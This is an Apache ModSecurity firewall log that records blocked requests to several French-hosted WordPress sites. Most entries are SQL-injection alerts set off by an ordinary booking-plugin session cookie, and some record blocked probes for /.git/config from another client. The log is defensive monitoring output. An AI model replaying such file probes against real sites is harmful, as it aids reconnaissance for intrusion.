[Mon May 11 18:34:49.893076 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFKUWKUxpmnkK7zHysmAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:50.231011 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFKkWKUxpmnkK7zHysmQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:50.231310 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFKkWKUxpmnkK7zHysmQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:50.877774 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFKkWKUxpmnkK7zHysmQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:51.196464 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFK0WKUxpmnkK7zHysnAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:51.196738 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFK0WKUxpmnkK7zHysnAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:51.799726 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFK0WKUxpmnkK7zHysnAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:52.015292 2026] [security2:error] [pid 1424905:tid 1424932] [client 43.166.247.155:55128] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "missmandarine.com"] [uri "/"] [unique_id "agIFLIW8yzYoWG_eyCXC2gAAAVg"], referer: http://missmandarine.com
[Mon May 11 18:34:52.071033 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFLEWKUxpmnkK7zHysnQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:52.071321 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFLEWKUxpmnkK7zHysnQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:52.477190 2026] [security2:error] [pid 1412074:tid 1412080] [client 34.11.35.165:43598] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-mobilite-regional.com"] [uri "/.git/config"] [unique_id "agIFLDJnyuKVXoStDhbjKwAAAEQ"]
[Mon May 11 18:34:52.477439 2026] [security2:error] [pid 1412074:tid 1412080] [client 34.11.35.165:43598] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-mobilite-regional.com"] [uri "/.git/config"] [unique_id "agIFLDJnyuKVXoStDhbjKwAAAEQ"]
[Mon May 11 18:34:52.705415 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFLEWKUxpmnkK7zHysnQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:52.815573 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFLEWKUxpmnkK7zHysoAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:52.815856 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFLEWKUxpmnkK7zHysoAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:53.311493 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFLEWKUxpmnkK7zHysoAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:53.577659 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFLUWKUxpmnkK7zHyspwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:53.577991 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFLUWKUxpmnkK7zHyspwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:54.151639 2026] [security2:error] [pid 1412074:tid 1412080] [client 34.11.35.165:43598] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-mobilite-regional.com"] [uri "/index.php"] [unique_id "agIFLDJnyuKVXoStDhbjKwAAAEQ"]
[Mon May 11 18:34:54.862210 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFLUWKUxpmnkK7zHyspwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:54.960117 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFLkWKUxpmnkK7zHysqwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:54.960422 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFLkWKUxpmnkK7zHysqwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:55.590966 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFLkWKUxpmnkK7zHysqwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:56.935760 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFMEWKUxpmnkK7zHysrAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:56.936043 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFMEWKUxpmnkK7zHysrAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:57.555923 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFMEWKUxpmnkK7zHysrAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:57.848149 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFMUWKUxpmnkK7zHysrgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:57.848475 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFMUWKUxpmnkK7zHysrgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:58.246067 2026] [security2:error] [pid 1416109:tid 1416151] [client 34.11.35.165:59180] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-mobilite-regional.com"] [uri "/.git/config"] [unique_id "agIFMlV4kyjgo4bQBUiBsAAAANU"]
[Mon May 11 18:34:58.246328 2026] [security2:error] [pid 1416109:tid 1416151] [client 34.11.35.165:59180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-mobilite-regional.com"] [uri "/.git/config"] [unique_id "agIFMlV4kyjgo4bQBUiBsAAAANU"]
[Mon May 11 18:34:58.402418 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFMUWKUxpmnkK7zHysrgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:58.745980 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFMg-Qm4vhlWBPlMjm4wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:58.746912 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFMg-Qm4vhlWBPlMjm4wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:59.252300 2026] [security2:error] [pid 1416109:tid 1416151] [client 34.11.35.165:59180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-mobilite-regional.com"] [uri "/index.php"] [unique_id "agIFMlV4kyjgo4bQBUiBsAAAANU"]
[Mon May 11 18:34:59.417775 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFMg-Qm4vhlWBPlMjm4wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:59.523854 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFMw-Qm4vhlWBPlMjm5AAAAAc"], referer: https://rentparadise.fr/wp-login.php
